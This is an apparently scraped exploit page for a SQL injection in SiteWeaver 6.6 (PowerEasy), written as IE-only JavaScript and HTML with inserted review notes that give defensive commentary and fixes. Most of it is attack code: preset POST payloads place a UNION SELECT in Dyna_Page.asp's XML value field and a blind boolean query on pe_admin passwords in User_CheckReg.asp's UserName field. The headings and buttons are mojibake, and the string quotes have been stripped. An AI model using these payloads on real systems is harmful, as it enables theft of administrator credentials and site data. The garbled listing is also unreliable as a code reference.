SiteWeaver6.6ע©Exploit


Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.<script> /* Review note: IE-only proof-of-concept page for a SQL injection in SiteWeaver 6.6 (PowerEasy "pe2006"). Everything below depends on Internet Explorer features (ActiveXObject, execScript, VBScript MidB/Chr), and every string delimiter has been stripped by extraction, so this listing does not run as-is. Defensive takeaway: the two server-side handlers named in Inject() - Dyna_Page.asp (the <value> element of an XML POST body) and Reg/User_CheckReg.asp (the UserName form field) - appear to concatenate request data into SQL text; the durable fix is parameterized queries (ADO Command parameters) plus strict type validation of numeric ids, and a request log / WAF rule for SQL keywords arriving in those two fields gives detection in the meantime. */ /* gb2utf8(data): converts a GB2312/GBK byte string (the raw XMLHTTP responseBody, read through VBScript MidB) into a JavaScript string. escape() renders the bytes as %-escapes; the regex chain on line 6 drops the %u prefixes, swaps each byte pair into high/low order, and tags sequences whose first hex digit is a letter with @ so that split(@) yields one double-byte code per element. Each 4-hex-digit code is turned into a character through VBScript Chr and cached in glbEncode. The eval() on line 12 is fed 4 characters taken from escape() output (hex digits / %-escapes only), which bounds the damage, but eval on response-derived data is still a pattern to avoid; a parseInt(k, 16) would do the same job. */ 2.function gb2utf8(data){ 3.var glbEncode = []; 4.gb2utf8_data = data; 5.execScript(gb2utf8_data = MidB(gb2utf8_data, 1), VBScript); 6.var t=escape(gb2utf8_data).replace(/%u/g,).replace(/(.{2})(.{2})/g,%$2%$1).replace(/%([A-Z].)%(.{2})/g,@$1$2); 7.t=t.split(@); 8.var i=0,j=t.length,k; 9.while(++i<j) { 10.k=t[i].substring(0,4); 11.if(!glbEncode[k]) { 12.gb2utf8_char = eval(0x+k); 13.execScript(gb2utf8_char = Chr(gb2utf8_char), VBScript); 14.glbEncode[k]=escape(gb2utf8_char).substring(1,6); 15.} 16.t[i]=glbEncode[k]+t[i].substring(4); 17.} 18.gb2utf8_data = gb2utf8_char = null; 19.return unescape(t.join(%)); 20.} 21. /* PostData(): sends the contents of the #post field to the URL in #url with a synchronous ActiveX XMLHTTP POST (open(..., false)), adds a form-urlencoded Content-Type only when the URL contains User_CheckReg.asp, decodes responseBody with gb2utf8 and writes it into #getResult. Note: responseBody is decoded before readyState/status are checked; with a synchronous request that is harmless, but a non-200 response is dropped without any message, so a failed request looks the same as an empty result. Network errors thrown by send() are not caught either. */ 22.function PostData(){ 23.var url = document.getElementById(url).value; 24.var post= document.getElementById(post).value; 25.var oXmlHttp = new ActiveXObject(Microsoft.XMLHTTP); 26.oXmlHttp.open(POST, url, false); 27.if (url.indexOf(User_CheckReg.asp)>0){oXmlHttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded);} 28.oXmlHttp.send(post); 29.var GetResult=gb2utf8(oXmlHttp.responseBody); 30.if (oXmlHttp.readyState == 4) { 31.if (oXmlHttp.status == 200) { 32.document.getElementById(getResult).value = GetResult; 33.} 34.} 35.} /* Inject(i): fills #url and #post with one of the two request templates shown on this page, both aimed at a local test instance (127.0.0.1:81/pe2006). i==1 loads the XML body for Dyna_Page.asp whose <value> element carries a UNION SELECT against PE_soft; any other i loads the form body for Reg/User_CheckReg.asp whose UserName field carries a boolean condition on pe_admin. From the defender's side both requests are POSTs carrying SQL keywords (union/select) inside an XML element or a form field that the application evidently passes to the database unparameterized. */ 36.function Inject(i){ 37.if (i==1){ 38.document.getElementById(url).value=http://127.0.0.1:81/pe2006/Dyna_Page.asp; 39.document.getElementById(post).value=<?xml version=1.0 encoding=gb2312?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>; 40.} 41.else 42.{ 43.document.getElementById(url).value=http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp; 44.document.getElementById(post).value=UserName=admino%20union%20select%201%20from%20pe_admin%20where%20username=adminband%20Mid(password,1,1)>0; 45.} 46.} 47.
48.</script> <!-- Review note: the form wires #url and #post to the script above. The first and third buttons call Inject(1) / Inject(2) to load the preset request templates, the middle button calls PostData() to send them, and the decoded response is shown in #getResult. The textarea's default content is the same Dyna_Page.asp XML template that Inject(1) loads. Button captions and headings are mojibake left over from the original GB2312-encoded page. --> 49.<BODY> 50.<div align=center>SiteWeaver6.6©ù</div> 51.URL<br> 52.<INPUT TYPE=text id=url value=http://127.0.0.1:81/pe2006/Dyna_Page.asp style=width:90%;>&nbsp;&nbsp;&nbsp;<br> 53.Post<br> 54.<textArea id=post style=width:90%; height:80;><?xml version=1.0 encoding=gb2312?> 55.<root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea> 56.<div align=center><INPUT TYPE=button value=©һʾ onClick=Inject(1);>&nbsp;&nbsp;<INPUT TYPE=button value=    onClick=PostData();>&nbsp;&nbsp;<INPUT TYPE=button value=©ʾ onClick=Inject(2);></div> 57.<hr size=2 > 58.ע<br> 59.<textArea id=getResult style=width:90%; height:200;></textArea> 60.</BODY>